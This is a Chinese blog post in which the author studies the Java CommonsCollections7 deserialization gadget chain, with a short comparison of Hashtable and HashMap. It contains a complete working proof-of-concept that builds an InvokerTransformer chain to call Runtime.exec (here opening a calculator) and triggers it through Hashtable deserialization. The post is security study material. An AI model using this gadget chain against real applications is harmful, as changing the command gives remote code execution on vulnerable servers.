java--CommonsCollections7 学习

最新推荐文章于 2022-12-21 20:55:55 发布
最新推荐文章于 2022-12-21 20:55:55 发布
阅读量212 收藏
点赞数 1
分类专栏: 代码审计学习 文章标签: java 学习 链表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/125057841
版权

根据之前的学习,发现看cc7应该很简单了。(环境:JDK8u311)

cc6使用了HashMap和HashSet,cc7使用的是Hashtable

Hashtable 与 HashMap 十分相似,是一种 key-value 形式的哈希表,但仍然存在一些区别:

  • HashMap 继承 AbstractMap,而 Hashtable 继承 Dictionary ,可以说是一个过时的类。

  • 两者内部基本都是使用“数组-链表”的结构,但是 HashMap 引入了红黑树的实现。

  • Hashtable 的 key-value 不允许为 null 值,但是 HashMap 则是允许的,后者会将 key=null 的实体放在 index=0 的位置。

  • Hashtable 线程安全,HashMap 线程不安全。

那么我们可以进入这个类看一下它的readObject方法,在最后有个reconstitutionPut方法

进入这个方法,发现其中会使用key调用hashCode方法,那么可以按照cc6中的TideMapEntry方法进行利用

实现代码

import java.util.Hashtable;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class cc7 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        Hashtable<Object, Object> hashtable = new Hashtable<>();
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator.app"})
        };
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{});
        
        Map lazyMap = LazyMap.decorate(new HashMap(), fakeChain);
        TiedMapEntry entry   = new TiedMapEntry(lazyMap, "zyer");
        hashtable.put(entry, "zyer");
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, transformers);
        lazyMap.clear();

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
        objectOutputStream.writeObject(hashtable);
        objectOutputStream.close();
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
        objectInputStream.readObject();
    }
}

学习到这,也算java入个小门了,以后继续分析其它的链子。参考su18师傅对这八个攻击链做一个总结

以下红色为入口点(kick-off),紫色为触发点(sink),其余为中间的调用链(chain)

近期会学习CTF web以及其它利用链,并分析shiro,weblogic,fastjson进行实战利用,

zyer1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache-commons-collections7反序列化链分析
12-02 225
apache-commons-collections7反序列化链分析 apache-commons-collections7反序列化链也是对ACC1链的变形利用罢了,倒是其中涉及一些hash知识 复现环境 JDK7+CommonsCollections1 前景知识 这里要在前面说一下的是Hashtable.put方法新增的元素,是存储在Hashtable$Entry这个内部类里面的,那么获取元素也是在这个内部类获取的,这个跟进一下Hashtable.put方法就能知道 LazyMap.put方法新增的元素,
java 7 collection 详解(一)
weixin_33835103的博客
09-03 133
一、综述 java集合框架定义了几个接口,这些接口决定了collection类的基本特性。不同的是,具体类仅仅是提供了标准接口的不同实现,如图,java集合框架接口图 从图可知,java集合类的主要是由两个接口派生而出——Collection和Map,Collection和Map是集合框架的根接口。其介绍如下:Collection — 位于集合框架的顶层,一...
[Java反序列化]—CommonsCollections7(CC完结篇)
Sentiment的博客
06-05 1187
CC7其实又跟CC5差不多,也是换了另一种方式来调用 流程 还是现根据链子先看下流程吧。中重写了,最后会调用 中,调用了方法— 所以就要看下哪里的()有问题,找到了类 最后还会retrun map.equals(object);,所以就要找下个,在中找到了 最后调用了方法,所以如果构造m为LazyMap对象,就可以成功向下执行 分析 在网上找了一些分析笔记但感觉分析的都不是很详细,而且这里涉及很多数据结构的内容,所以我这里也是尽可能的详细分析一下首先在执行readObject后,会在1173行对赋值,赋值后
Java安全—CommonsCollections7
qq_52988816的博客
08-17 507
Hashtable在调用put方法添加元素的时候会调用equals方法判断是否为同一对象,而在equals中会调用LazyMap的get方法添加一个元素(yy=yy),如果lazyMap2和lazyMap1中的元素个数不一样则直接返回false,那么也就不会触发漏洞。所以我们可以这样:在添加第二个元素后,lazyMap2需要调用remove方法删除元素。...
java集合(7) Collections
weixin_39452731的博客
08-04 135
Collections是一个操作集合的工具类,在文档中有很多方法,这里这列举一些常用的,更多方法可以查阅文档 package Collections; import java.util.ArrayList; import java.util.Collections; public class SearchTest { public static void main(String ...
java-7-openjdk-amd64
07-15
安装包:java-7-openjdk-amd64.tar.gz 使用方法 1. 拷贝至服务器/个人电脑 2. 解包 mkdir /opt/jdk/ tar -zxvf java-7-openjdk-amd64.tar.gz -C /opt/jdk/ 3. 配置编译环境 JAVA_HOME=/opt/jdk/java-7-openjdk-amd...
mysql-connector-java-8.0.22.jar
08-14
包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-8.0.22.jar包含mysql-connector-java-...
java学习-java中的String类型
12-01
java学习-java中的String类型
java学习平台-论文
最新发布
02-01
java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文...
MySQL-connector-java-8.0.28
04-20
Java 连接 MySQL 必备的 JAR 包,使用前记得解压文件哦!压缩包里面的 .jar 文件才是我们需要使用的!
CommonsCollections 3~7分析
qq_31065143的博客
04-05 310
CommonsCollections 3~7分析 前言 看完了CC1和CC2后面的内容都简单的多了,所以就一起分析一下。 CC3 测试环境 jdk1.7 Commons Collections 4.0 漏洞分析 cc3和cc1和cc2蛮像的,就是cc1+cc2的变种,在cc3中引入了新的类TrAXFilter和InstantiateTransformer。在cc2中是利用InvokeTransform触发newTransFormer进行命令执行的,而在cc3中,则是通过TrAXFilter触发NewTr
Java安全--CC7
qq_64201116的博客
12-21 954
在学CC7的时候我有这么几个疑问1.为什么要两个LazyMap2.hashCode那一步怎么计算的3.为什么要remove yy4.为什么put两个我们可以先看一下CC7的链子是怎么走的:其实分析链子还是从命令执行走到readObject比较好理解,虽然比较麻烦,比较繁琐,但还是这样子分析提升比较大,主要是知道自己在写啥,知道某个地方我们需要传入什么,不用抄一份payload去调试。
Collections Collection 和 Collections的区别
weixin_30908103的博客
09-22 236
Collections:它的出现给集合操作提供了更多的功能。这个类不需要创建对象,内部提供的都是静态方法。 静态方法: Collections.sort(list);//list集合进行元素的自然顺序排序。 Collections.sort(list,new ComparatorByLen());//按指定的比较器方法排序。 class ComparatorByLen implements...
Collections
Valentino112358的博客
04-13 165
常用功能 java.utils.Collections是集合工具类,用来对集合进行操作。部分方法如下: public static <T> boolean addAll(Collection<T> c, T... elements):往集合中添加一些元素。 public static void shuffle(List<?> list) ...
Java代码审计——Commons Collections7 HashTable
王嘟嘟的博客
12-15 1146
0x00 前言 最后的这几条链基本上就都是第三段的利用方式了,基本上拼接到A和B就可以了。 0x01 HashTable 这里是通过HashTable来进行触发LazyMap的。首先肯定是要来看一下HashTable的readObject方法。 在HashTable中readObject方法中,调用了reconstitutionPut方法,在reconstitutionPut中最主要的是map,而map是Entry类型的,我们可以通过put方式进行赋值 poc: hashtable.put(lazyMa
java commons collection,Java教程:CommonsCollections学习笔记(三)
weixin_39540018的博客
03-09 74
这个Map类是基于红黑树构建的,每个树节点有两个域,一个存放节点的Key,一个存放节点的Value,相当于是两棵红黑树,一棵是关于key的红黑树,一棵是关于Value的红黑树。关于红黑树的详细介绍,参考《C#与数据结构--树论--红黑树(Red Black Tree)》这篇文章。public final class DoubleOrderedMap extends AbstractMap{priv...
java7安全站点_Java安全之Commons Collections7分析
weixin_32323455的博客
02-26 159
Java安全之Commons Collections7分析0x00 前言本文讲解的该链是原生ysoserial中的最后一条CC链,但是实际上并不是的。在后来随着后面各位大佬们挖掘利用链,CC8,9,10的链诞生,也被内置到ysoserial里面。在该链中其实和CC6也是类似,但是CC7利用链中是使用Hashtable作为反序列化的入口点。0x01 POC分析package com.test;imp...
Java反序列化(九)Common Collection 7分析
Vicl1fe的博客
09-29 336
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 先放出完整的POC package
CommonsCollection7分析
笑花大王
01-02 619
CommonsCollection7调用流程 调用链 HashTable.readObject() | TransformingComparator.compare() | InstantiateTransformer.transform() | TrAXFilter.TrAXFilter() | TemplatesImpl.newTransformer() ...
centos7安装java-11-openjdk
06-02
sudo yum install java-11-openjdk-devel ``` 3. 输入以下命令以确认Java是否正确安装: ``` java -version ``` 如果Java已成功安装,您将看到Java版本信息的输出。 希望这可以帮助您在CentOS 7上安装Java 11 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值